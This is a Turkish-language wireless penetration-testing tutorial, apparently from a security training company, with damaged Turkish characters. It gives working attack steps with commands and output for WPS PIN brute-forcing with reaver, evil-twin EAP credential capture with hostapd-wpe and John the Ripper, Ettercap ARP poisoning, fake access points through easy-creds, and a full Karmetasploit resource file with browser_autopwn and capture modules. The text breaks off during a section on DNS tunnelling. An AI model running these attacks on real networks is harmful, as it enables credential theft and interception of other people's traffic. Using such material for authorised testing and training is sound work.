WPS Destekli Kablosuz Eriim Noktalar Gvenlik Testleri WPS(WiFi Protected Setup) gvenli bir a kurmak iin hzlca aksiyon almay salayan bir teknolojidir. Normal bir kullanc iin, AP zerindeki PIN numaras balanlmak istenen sistemde girilir. WPS ile balandktan sonra gerekli konfigrasyonlar otomatik olarak yaplr ve kullancya gl bir WPA-PSK parolas oluturulur. WPS PINleri sadece rakamlardan oluur ve 8 hanelidir. Son hanesi dier 7 hanenin doruluunu kontrol(checksum) iin kullanlr. Bu durumda bir PIN kodunun alabilecei deerler en fazla 107(10 000 000)dur. WPS kulland protokol gerei ise bu 7 haneyi, 4 ve 3 haneli olmak zere iki ksma ayrp kontrol eder. lk 4 hane iin olas ihtimaller 104(10 000) ve sonraki 3 hane iin 103(1000) toplamda ise 11000 olur. Baz AP reticileri bu PIN kodunu her cihaz iin ayn yapmakta bazlar ise MAC adresinin son 6 hanesine gre hesaplamaktadr. Airties ve baz retici modemlerinde 5 PIN denemesinde sonra WPS kilitlenir ve bu



yolla yeni kullancnn balanmasna izin verilmez. AP kapatlp tekrar balatlana kadar bu koruma devam eder. Bunu atlatmak iin bilinen bir yntem yoktur. WPS saldrlarnda yaplan ise bu 11000 ihtimali kaba kuvvet saldrsyla ya da ntanml PIN numarasn girerek krmaktr. Bunun iin nce monitor moda gre geilir


kts byledir

Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 2255 dhclient 13980 dhclient 32353 wpa_supplicant Process with PID 2255 (dhclient) is running on interface wlan1 Process with PID 13980 (dhclient) is running on interface wlan1 Process with PID 32353 (wpa_supplicant) is running on interface wlan1 Interface Chipset Driver wlan1 Atheros AR9271 ath9k - [phy4] (monitor mode enabled on mon0)

PIN kodu, arama motorlarnda aratlabilir yada MAC adresinin son 6 hanesinden PIN hesaplayan eitli scriptlerle bulunabilir.

APler wash aracyla taranr:

wash -i mon0

Hedef belirlenirken WPS Locked ksmnn No olmasna dikkat etmek gerekir. Yes olanlar APnin daha nce bahsedildii gibi WPS kaba kuvvet saldrlarna kar nlem alnan ve artk bu yolla kullanc almayan tipte olduunu belirtir. Ayrca RSSI altnda belirtilen dbm deerinin de kk(reel olarak) olmamasna dikkat etmek gerekir.



Hedef belirlendikten sonra -b ile MAC adresi, -c ile alt kanal, -e ile SSID ve -p ile PIN kodu verilir. -p verilmese dahi reaver olas tm deerleri deneyecektir.

reaver -i mon0 -b 90:F6:52:82:B2:E2 -p 85654747 -e BGASinif -c 8 -vvv

Doru PIN numaras iin sonu aadaki gibi olur.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Switching mon0 to channel 8 [+] Waiting for beacon from 90:F6:52:82:B2:E2 [+] Associated with 90:F6:52:82:B2:E2 (ESSID: BGASinif) [+] Trying pin 85654747 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 4 seconds [+] WPS PIN: '85654747' [+] WPA PSK: 'BGASinif!!' [+] AP SSID: 'BGASinif' [+] Nothing done, nothing to save.



EAP Kullanlan Kablosuz A Ortamlarna Ynelik Gvenlik Testleri Bu test iin hedef kurumla ayn SSIDye sahip, her trl EAP metotunu kabul eden, arkada kimlik dorulama iin RADIUS sunucu alan sahte bir AP yayn yaplacaktr. stemci tarafnda doru yaplandrmalarn yaplmad(sunucu sertifikasnn dorulanmamas, yeni RADIUS sunuculara balandnda bunun prompt kartlarak kullancya sorulmas, public sertifikalara her zaman gvenilmesi gibi) kurumsal alarda bu atak baarl olabilir. Atak iin hostapd arac kullanlacaktr. Aracn indirilmesi ve kurulumu githubdaki sayfas harfiyen takip edilerek yaplabilir. Githubdaki sayfada hostapd-2.2 ve bu atak iin gerekli hostapd-wpe pathci bulunmaktadr. Kurulum tamamlandktan sonra hostapd2.2 altndaki hostapd-wpe dosyas altrlr. altrmak iin bir konfigrasyon dosyas gerekmektedir. Kurulum iinde bu dosya gelmektedir. Normal hostapd.conf dosyas ierisinde ileriye seviye ok fazla opsiyon bulunmaktadr. Kurulum srasnda yaplan patch ilemiyle bize en gereki satrlarn aktif edildii hali hostapd-wpe.conf olarak yer alr. Ama bunun zerinde de baz deiikliler gerekmektedir:

interface=wlan1 #driver=wired ssid=BGA-Personel hw_mode=g channel=1

hostapd-wpe -s hostapd-wpe.conf

ile altrlabilir.

root@kali:~/tools/wifi/hostapd-2.2/hostapd# ./hostapd-wpe -s hostapd-wpe.conf Configuration file: hostapd-wpe.conf Using interface wlan1 with hwaddr a0:f3:c1:27:bf:e8 and ssid "BGA-Personel" wlan1: interface state UNINITIALIZED->ENABLED wlan1: AP-ENABLED



Bir kullanc balandnda:

wlan1: STA 28:ba:b5:39:c0:1d IEEE 802.11: authenticated wlan1: STA 28:ba:b5:39:c0:1d IEEE 802.11: associated (aid 1) wlan1: CTRL-EVENT-EAP-STARTED 28:ba:b5:39:c0:1d wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1 wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25 mschapv2: Thu Sep 18 13:40:18 2014 username: deneme challenge: 79:4e:1d:af:93:8f:a6:d8 response: e2:11:13:e5:74:87:48:ae:56:61:6c:11:35:7e:c9:0d:a8:7a:63:0d:5b:89:d4:68 jtr NETNTLM: deneme:$NETNTLM$794e1daf938fa6d8$e21113e5748748ae56616c11357ec90da87a630d5b89d468

Son satrda bize jtr koduyla John The Ripper arac ile krmak iin format vermitir. deneme:$NETNTLM$794e1daf938fa6d8$e21113e5748748ae56616c11357ec90da87a630d5b89d468 satr bir metin dosyasna yazlr.

root@kali:~/tools/wifi/hostapd-2.2/hostapd# john --format=NETNTLM deneme-eap Loaded 1 password hash (NTLMv1 C/R MD4 DES (ESS MD5) [32/32]) deneme (deneme) guesses: 1 time: 0:00:00:00 DONE (Thu Sep 18 13:48:03 2014) c/s: 800 trying: deneme - emened



Man-in-the-middle(MITM) testleri En ok karlalan atak trlerindendir. Saldrgan kullanc ile AP arasna girer ve tm trafiin kendisi zerinden akmasn salar. Sslstrip gibi aralarla HTTPS trafii iinde araya girebilir. Bu saldr farkl protokoller iinde uygulanabilir. Genelde ARP poisoning(zehirleme) teknii kullanlr. ARP poisoning temelinde yerel adaki sistemlerin birbirleriyle MAC adresleriyle haberlemesi vardr. MAC adresi ile haberleme OSI katmannn 2. katmanna denk gelir. Haberleme ARP istekleriyle gerekletirilir. Bir sistemin yeni bir aa dahil olduunu ve bu adaki dier bir sisteme ping atmak istediini dnelim. Sistem eer bu IP ile daha nce iletiim kurmu olsayd kendi ARP tablosuna bakard. Aa yeni dahil olduunda (yada daha nce o IP ile iletiim kurmadysa) ncelikle broadcast bir istekte bulunur. Bu istekte hedef IPnin kime ait olduu sorulur. Hedef sistemden gelen yantla o IPye ait sistemin MAC adresini elde eder. Bu MAC adresi-IP ikilisi artk sistemin kendi ARP tablosuna da gemitir. rnek ekran grntsnde 172.16.16.186 IPsine sahip sistemden 172.16.16.14 IPli sisteme ping atlmtr. Daha nce balant kurulmad iin nce Broadcast ARP isteinde bulunulmutur.

Bu istekten nce ARP tablosu:

Bu istekten sonra ARP tablosu:

MitM saldrlarnda saldrgan kurban sisteme gatewayin IPsine karlk kendi MAC adresinin olduu ARP paketi gnderir. Bylece gateway olarak kendisini grmesini salar. Dier yandan ise gatewaye kurbann IPsine karlk kendi MAC adresinin olduu ARP paketi gnderir. Bylece gateway saldrgan asl kullanc olarak grr. Artk kurbandan kan istekler nce saldrgann sistemine, ordanda gatewaye ulaacaktr.



Bu atak tipi Ettercap zerinde simle edilmitir. alma ortam Kalidir. Ettercap balatlr.

root@kali:~# ettercap -G

Srasyla aadakiler aktif edilir;(Yaplan ilemler aa ksmda grlebilir.) Options Promisc mode Sniff Unified sniffing Bu seildikten sonra bir prompt kar hangi a arayzn dinlenecei sorulur(wlan0,eth0 gibi).Kablosuz a iin wlan0, wlan1 gibi a kartnn bal olduu arayz seilir.) Hosts Scan for hosts Bir ka kere altrlmas iyidir. Hosts Hosts list Bu seildiinde tespit edilen sistemler listelenir.

kan listedekilerin hepsi seilebilir. Bu o adaki tm trafiin kendi sistemimizden gemesi demektir.

Sadece gatewaye ait IP iin Add to Target 1, geri kalan iin Add to Target 2 denilirse tm istemci sistemlerin gatewaye ularkenki trafii zerimizden geer.

Sadece gatewaye ait IP iin Add to Target 1 deyip, atak yaplmak istenen bir ka IP iin Add to Target 2 denilirse sadece o IPlere ynelik zehirleme gerekletirilir.

Kapsam belirlendikten sonra saldry balatmak iin Mitm sekmesinden Arp poisoning seilir. Mitm Arp poisoning stemci sistemler zerinde saldr ncesi ve sonras arp tablosu kontrol edilirse gateway IPsine karlk gelen MAC adresinin deitii grlebilir. View Connections sekmesinden kurulan trafik grntlenebilir.



Buradan sunucu ya da istemci tarafna kod enjekte edilebilir.



Sahte Eriim Noktas (AP) Kurulumu ve Trafik nceleme Sahte AP yayn, kurum isimleriyle veya insanlarn ilgisini ekebilecek bir SSIDyle bir kablosuz a yayn yapmay ifade eder. Bir nevi sosyal mhendislik saldrs olan bu atakta kullanclar aa balanr ve internete karlar. Btn trafikleri sahte AP zerinden getii iin arp zehirleme, dns zehirleme gibi mitm saldrlar veya oturum almak iin sidejacking ataklar yapmak mmkndr. Bu atak bazen Evil Twin ismiyle de anlr. Zaten var olan hedef APnin tm zellikleri saldrgan tarafndan tespit edilir ve bu zelliklerle gerek APden daha gl bir yayn yaplarak kullanclarn balanmas beklenir. Bu amala kullanlacak ara easy-credstir. Bu ara aslnda dier bir ok arac isteimiz ynde yaplandrr ve ileri ok kolaylatrr. Gerekli olan aralarn listesi yledir: * screen * freeradius (with wpe patches) * hamster * ferret * sslstrip * dsniff * urlsnarf * metasploit * airbase-ng * airodump-ng * hostapd * mdk3 * ipcalc * asleap Bunlarn bir ou halihazrda Kali zerinde ykldr. Olmayan aralarn kurulumu iin github sayfas yardmc olabilir.

wget https://github.com/brav0hax/easy-creds/archive/master.zip unzip master.zip ./installer.sh

ile indirilir. Zip dosyas kartlr ve Bash dosyas altrlr. Kurulum admlar takip edilir ve kurulum tamamlanr. easy-creds /opt dizini altna kurulur. Direk olarak

easy-creds

ile arlr. Aadaki seenekleri bize sunar.

1. Prerequisites & Configurations 2. Poisoning Attacks 3. FakeAP Attacks 4. Data Review 5. Exit



q. Quit current poisoning session Choice:

Sahte AP yayn iin srasyla 3. FakeAP Attacks 1. FakeAP Attack Static seilir.

Would you like to include a sidejacking attack? [y/N]: N

1. soruya N(No=Hayr) yazlr ya da enter tuuyla geilir. 2. admda internete bal arayz sorar, eer Kaliyi sanal makine zerinde kullanyorsak buna muhtemelen eth0 yazlr. rnek: eth0 3. admda sahte yayn yaplaca arayz sorar; wlan0, wlan1 gibi. rnek: wlan1 4. admda sahte AP yayn iin SSIDyi sorar. Burada kurum ad veya FreeWifi gibi insanlarn ilgisini ekebilecek bir SSID girilir. rnek: TTNET WiFi 5. admda kanal numaras girilir. 1, 6, 11 tercih edilir. rnek: 6 6. admda easy-creds wlan1 arayzn monitor moda geirir ve bunu yazarz. rnek:mon0 7. admda MAC adresi deitirmek istiyor musun diye sorar. rnek: N 8. admda kurban kullanclarn balanaca kablosuz arayz belirtilir. Bu arayze gelen trafik internetin olduu arayze(eth0) kprlenecektir. rnek: at0 9. admda kullanclara verilecek IP iin DHCP konfigrasyon dosyas var m diye sorar. N tercih edilir. rnek: N 10. admda kullanclarn hangi subnetten IP alaca belirtilir. rnek: 10.0.0.0/24 Not: Eer dhcp'nin balatlamad ile ilgili bir hata alnyorsa ya da IP alnamyorsa easy-creds.sh dosyas alarak 731. satrda dhcpd3, dhcpd ile deitirilebilir. 11. admda DNS sunucusu girilir. rnek: 192.168.2.1(Modem IPsi) Bylece easy-creds Airbase-ngyi altrarak yayn balar. Sonra DMESG, SSLStrrip, ettercap, URL snaff ve dnsiff kk pencerelerde alr. easy-credsde balangtaki mensne dner.



Bir kullanc aa balandnda Airbase-ng penceresinde u ekilde grlr.

Yakalanan verileri grntlemek iin 4. Data Review seilir ve hangi aracn kts grntlenmek isteniyorsa o numara girilir. rnek: 3. easy-creds bize log dosyasnn yerini gsterir ve bize tam yolu girmemizi ister.

Ettercap logs in current log folder: /root/easy-creds-2014-07-20-1424/ettercap2014-07-20-1425.eci Enter the full path to your ettercap.eci log file: /root/easy-creds-2014-07-20-1424/ettercap2014-07-20-1425.eci

Kopyala - yaptr yaplarak yol belirtildiinde aadaki gibi kk bir pencere alr ve URL,kullanc ad, parola bilgisi listelenir.



Karmetasploit lk olarak KARMA ismiyle ortaya kan Karmetasploit, sahte AP yayn yaparak istemcilerin balandklar her istee cevap vermeyi amalyordu. Sahte APye balanan istemcinin web, FTP, DNS gibi servisler iin her isteine metasploitin halihazrda ykl olan modlleriyle cevap verilir. Ancak burada KARMAnn sahte AP yayn yapmaktan ok nemli bir fark vardr. Bilgisayarlar Probe Requestler ile daha nce baaryla balandklar APlerin SSIDleri iin yayn yaparlar. Normal artlarda bilgisayarlar daha nce baland(gvendii) bir an, etrafta daha kaliteli yayn yaptn farkederse otomatik olarak ona balanr. KARMA ise ie bu noktada dahil olur. Probe Requestlerde yer alan her SSID iin Beacon frameler yaynlar. Eer birisi etrafta KARMA ile ava ktysa daha nce balanlan btn APler yayndaym gibi grlebilir. Bunlardan herhangi birisine balanlmaya alldnda ise a ifreli gzkse dahi sahte APe balanlr. Bu atak easy-creds arac ile yaplabilir ancak fikir vermesi asndan manuel yaplmtr. Saldr iin ncelikle DHCP servisi yaplandrlmaldr. Bunun iin aadaki deerler /etc/dhcp/dhcpd.conf dosyas iine yazlr. (locate dhcpd.conf komutu ile dosyann nerede bulunduuna dair fikir edinilebilir.)

default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }

Sahte AP yayn yaplacak arayz monitor moda geirilir




Ardndan airbase-ng arac ile yayna balanr. BGA_Wifi yerine istenilen SSID yazlabilir.

airbase-ng -P -C 30 -e "BGA_WiFi" -v mon0

Airbase-ng default olarak at0 diye bir arayz oluturacaktr. Bu arayz iin IP ve a maskesi verilir.

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

Balanacak kullanclara IP verebilmek iin dhcpd biraz nce oluturulan dhcpd.conf dosyas ile yaplandrlr.

dhcpd -cf /etc/dhcp/dhcpd.conf at0

tcpdump ile at0 a arayzne gelen tm trafik yakala dosyasna kaydedilebilir.

tcpdump -tttnn -i at0 -w yakala

Ve son olarak iinde metasploit modlleri ve gerekli ayarlar bulunan karma.rc dosyas msfconsole tarafndan okutulur.

msfconsole -r karma.rc

karma.rc dosya ierii aadaki gibidir. Btn servisler(pop3(s),imap(s),ftp,smtp,http(s),dns) yerine sadece belirli servislerde altrlabilir.

use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads set LHOST 10.0.0.1 set LPORT 45000 set SRVPORT 55550 set URIPATH /ads run use auxiliary/server/capture/pop3 set SRVPORT 110 set SSL false run



use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true run use auxiliary/server/capture/ftp run use auxiliary/server/capture/imap set SSL false set SRVPORT 143 run use auxiliary/server/capture/imap set SSL true set SRVPORT 993 run use auxiliary/server/capture/smtp set SSL false set SRVPORT 25 run use auxiliary/server/capture/smtp set SSL true set SRVPORT 465 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 5353 run use auxiliary/server/fakedns unset TARGETHOST set SRVPORT 53 run use auxiliary/server/capture/http set SRVPORT 80 set SSL false run use auxiliary/server/capture/http set SRVPORT 8080 set SSL false run use auxiliary/server/capture/http set SRVPORT 443 set SSL true run



use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run

airbase-ng balatldnda yle bir kt verir

root@kali:/etc/dhcp# airbase-ng -P -C 30 -e "BGA_WiFi" -v mon0 20:32:44 Created tap interface at0 20:32:44 Trying to set MTU on at0 to 1500 20:32:44 Trying to set MTU on mon0 to 1800 20:32:44 Access Point with BSSID A0:F3:C1:27:BF:E8 started. Error: Got channel -1, expected a value > 0. 20:33:07 Got broadcast probe request from 00:23:08:E9:B4:DF 20:33:07 Got broadcast probe request from 00:23:08:E9:B4:DF ..

Aadaki 2 ekran grntsnde yer alan btn SSIDler sahtedir. Hibirisi civarda yayn yapmamaktadr.

Sahte APye bir istemci balandnda aadaki gibi bir kt verir.

rnek olarak yahooya eriilmeye alldnda IP olarak 10.0.0.1 grlmekte ve farkl bir sayfa gelmektedir.



Metasploit tm istekleri takip eder.

Bunlarn arasnda cookie bilgileride vardr.



Captive Portal Gvenlik Testleri Captive portal uygulamalara ynelik yaplacak gvenlik testleri bir ka gruba ayrlabilir.

Web uygulamas zerinde gvenlik zafiyeti aratrlmas, Captive portal uygulamasna dahil olmadan internete kma almalar, Sisteme kayt olmu bir kullanc bilgisini kullanarak internete kma: MAC adresi deitirilerek, Son bir seenek olarak captive portal uygulamas sahte AP yayn ile birletirilebilir. Hedef kurumun

captive portal iin kulland bir sayfa kopyalanarak, sahte APye balanan kullanclar bu sayfaya ynlendirilirler.

lk seenek konu ddr.

Captive portal uygulamasna dahil olmadan internete kma almalar: DNS Tnelleme TEORK Bir protokol ierisinde baka bir protokole ait veri tama ilemine protokol tnelleme denir. DNS paketleri iersinden herhangi bir tcp/udp paketini (rnein, http,ftp, ssh vb.) tama ilemi de DNS Tnnelleme olarak isimlendirilir.



DNS sunucu kendisinden sorgulanan bir dns isteine nce nbelleini kontrol ederek yant vermek ister eer alan ad dns nbelleinde yoksa, sorgulanan alan adndan sorumlu dns sunucuyu bulur ve ona sorar. Sorgulanan alan adndan yetkili dns sunucu ilgili dns kayd iin yant verir ve DNS sunucu bu yant istemciye iletir. rnek olarak kullanc, tunnel.bga.com.tr alan adn sorgulamak istediinde yerel andaki dns sunucu bu kayt nbelleinde yoksa bu istee dorudan yant veremez. tunnel.bga.com.tr alan adndan sorumlu dns sunucuyu bulur dns.bga.com.tr ve ona tunnel A kaydn sorar ald yant istemciye iletir. DNS tnel aralar, dns verisini encode ederek ISP'nin dns sunucusuna iletir. ISP

1) pentest Çalışmalarında kablosuz ağ güvenlik testleri

Documents